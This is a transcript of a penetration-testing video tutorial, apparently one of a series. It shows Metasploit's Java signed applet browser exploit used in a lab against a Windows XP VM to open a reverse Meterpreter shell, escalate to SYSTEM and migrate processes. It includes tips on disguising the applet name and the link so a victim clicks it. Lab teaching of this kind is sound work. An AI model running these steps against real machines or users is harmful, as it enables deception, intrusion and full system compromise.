Alright, so in this video we're going to talk about Java, and in the last Adobe video I briefly talked about Java and how both Java and Adobe commonly have a lot of vulnerabilities, and they play this cat and mouse game going back and forth. We find vulnerabilities and then they patch it, and it just goes back and forth, back and forth. But Adobe and Java are extremely common for having some sort of vulnerability, and they're constantly having to patch their stuff. But at least they do patch their stuff. So there was one particular Java exploit, the one that I'm going to show you, that worked pretty well. I mean, it really did a good job. And just recently, Java has increased their security, so we're going to have to tamper with it just a little bit. But I just want to at least show you a little bit of a variety. So I'm going to jump to my XP machine. And here's my XP machine. Now, I connected my XP machine to the NAT adapter and went online and went to just java.com and downloaded Java. Now, I had to download the offline installer. Let me see if I can find, let's see, my computer. Actually, start menu, my documents. Let me look in the downloads folder. And here it is right here, JRE7_51 Windows. This is the one that it downloaded, but I had to download the offline version because for whatever reason I've been having problems with the online installer. I was having some issues with that. So I went ahead and just today downloaded the brand new one, verified that it installed, and right now, of course, I am not connected to the internet. So it should actually, yep, Internet Explorer cannot display the web page, so that's normal. We're on our host only again, and I'm going to go ahead and verify my IP address just really quick, and we are back connected to the network, which is good. So the only thing that we have to do with this is turn the security settings down on the Java application, which most people probably will not do. But like I said, I'm just trying to show you a variety, and this is something recently that they just started doing. Before, I mean, this exploit was awesome. Didn't have to do anything like this, it would just work right out of the box. So just to go through with this, we're going to go to the Start menu, Control Panel, and we have the Java. Once we have Java installed, it's right there. Double click on that, and if I go to the Security tab, we can see that it's on medium. So high is by default where it was. Very high and high, it's not going to work. It's going to block what we're trying to do, but medium will still work. So I'm just going to hit apply, say OK, and we should be ready to go. So I'm going to go back to my Kali machine, and what we're going to do is we need to search for the Java signed applet, and so we can do a search Java_signed_applet. Actually, it's just one T. It doesn't find it, so let me search Java signed and see what comes up there. There we go, and there's just the one T. That's why I didn't find it before. So we're going to go to use exploit multi browser Java signed applet. And another, you can see here that the rank on this is excellent, and you can also see that it is a multi-exploit, and it's browser based, so no matter what OS you were using, as long as you had Java, this would work, which was another awesome reason why I liked this exploit. And I'm assuming that once there's a few updates here in Metasploit, they'll probably change the ranking of this to probably a normal or lower rank, just because by default, out of the box, it's not as good as it used to be because Java is patching their stuff or making it more difficult. So let's use that exploit. Let's show options, and there's going to be a couple different things. We need to set our server host or our SRV host. The port 8080, that's fine, we can leave that by default, and we're also going to change the URI path. If we don't change the URI path, it's not required, but it's going to have like a long string of numbers and letters, and I just want to keep it simple, and this will all make sense here in just a second. So let's start with set srv host to 192.168.1.101. That's going to be us. That's the attacker machine, your Kali machine. Show options, and we could change the applet name and the certcn. We can change that information, but in this case it's not really going to matter. But if we wanted to put, like, let's say I could put Java, or I could put Oracle, Microsoft, I can change the applet name to whatever I wanted it, and the certcn I can change that as well, and that might make it look more convincing. So I'm going to leave that alone though, and we're going to just change this URI path, and I'm going to do set URI path, which you'll see why here in just a second, and ABCD. Show options. There we go, and it looks good. So the native payload that's down here, it's going to actually use Windows Meterpreter and reverse TCP. That's what it should do. We can additionally set our payload to Windows Meterpreter. Let's see if it catches up there. I use the tab. There we go. Reverse TCP. Now, before, a long time ago, a bunch of videos back, I mentioned that some exploits won't mix and match with all of the payloads. There's some exploits where the payload won't, we can't fit all those bytes of the payload into what we're trying to do, and so sometimes it won't allow you to use certain payloads. So if you ever use a payload and it tells you that it can't be used with the exploit, that's what that means. Just want you to be aware with that, because if you start switching your payloads, you may notice that some of them won't actually work with the particular exploit, and that is usually dependent on size. That's the amount of bytes that they can fit and send it over. And so sometimes there's not enough room in the application to fit everything that we want it to do. But in this case, we're okay. So all we're going to go ahead and do is show options. We're going to go ahead and set our lhost 192.168.1.101. Again, that's our Kali machine. Show options. And lport 444, that's fine, no big deal. You'll see all this will make sense here in just a second, and let's go ahead and just type in exploit. What this is going to do is this is going to start a server, and it's going to produce a URL. This is our target URL. Now, we would somehow have to get the user to click on this. There's different methods that we can use to try, and nothing inside of Metasploit. There's other things that we can do to try and encode this URL to look like something else. We can shorten the URL. There's a bunch of different things that we can try. But in this video, we're not going to cover that. We're just going to cover, try to stick on Metasploit as much as we can. So a lot of this other stuff, you're going to just have to use your imagination, figure it out. Use Google, send me a message if you need to get some more ideas, and I don't have an issue with that. So what we're going to go ahead and do is, if I would have not set the URI path, it would have been our IP address :8080, which is up here, our server port, and it would have been like a long string of random letters, uppercase and lowercase and all that. So I just moved it to ABCD just to make things more easy. So let's go to our XP machine, http://192.168.1.101. It's going to be :8080/ABCD, I think is what I did. Yep, ABCD. So what we're going to go ahead and do now is hit enter. Loading, please wait. Let's go ahead and switch back over here. We can see now it's starting to send over some of the Java, the jar files here, and it's waiting for the user to click accept. Now we get this pop-up here. Now it used to not say this. This is actually pretty recent. Name metasploit.payload. Well, that's pretty mean. That kind of ruins it for us. Now you could technically click I accept, and you can click run, of course, and just wait a little bit longer. We're going to go back to Kali. We can see that it's sending the stage, and we have a Meterpreter session. Now, it's going to stay like this because we're running a server. So if there was other machines that were clicking on this link, we would see a Meterpreter session number 2, Meterpreter session number 3, and so forth. What we can do at this point, because we don't have any other machines, we're not expecting any other machines to connect, is I can just hit enter. Now I can do a sessions-L to list our Meterpreter sessions, and we have one that's available. It's in the background. So now we can do sessions-I to interact, and the ID, which is 1. And we have a Meterpreter session. I can get UID, I can get system, grab the system, do a PS. Now we can do our migration. And we can go ahead and let's go to 916. Migrate 916. 2212. We can see that it's this weird exe, and it was in the temp folder. So now we have successfully migrated. Get PID. Yep, we are 916, which is one of the SVC hosts right here, running as NT Authority system. So I know that that's not as pretty and as nice and cool as it could be. It used to be. Let me tell you, it worked very well. It didn't tell us that it was Metasploit and all this. It would pop up with a little Java thing and say that you know, I forget what the exact error was, but it would have a little pop-up, but most people just click yes or whatever, and then it would do the same thing. Now Java's getting a little bit more protective, and even though that we lowered those security settings, it still gave us a pop-up and actually said that it was Metasploit, which is actually very scary. But there's a ton of other Java exploits that you can look up. All you would need to do, I'm going to go ahead and exit this. Again, we can just do a search on Java, and it's going to display a lot of things. Some of the exploits in here are for older versions of Java, so you can play with those if you want, but this really was probably the best example of the Java exploits that I could give you. It's just now, again, Java's just getting more secure, I guess. So here's all the listings for Java. You can see that there's some payloads. There's actually a Java Meterpreter reverse TCP. I've used that before with a different Java exploit. I'm not sure. I don't think we can actually use that one with the one that we just used. So you would just look for exploit. There's one for Windows. Obviously, we should look for browser. That's usually what we would look for. Let's see here. There we go. Multi-browser. This one has an excellent rating, 2007. There's one for 2013. But anyways, so you can just do your little homework. If you want to check out some of these other exploits for Java, you're more than welcome to. But I just wanted to show you a little bit of variety. So again, I know it wasn't the best, but I hope you guys enjoyed the video. And in the next few videos, we're going to be getting some really cool stuff. So stay tuned. Thanks.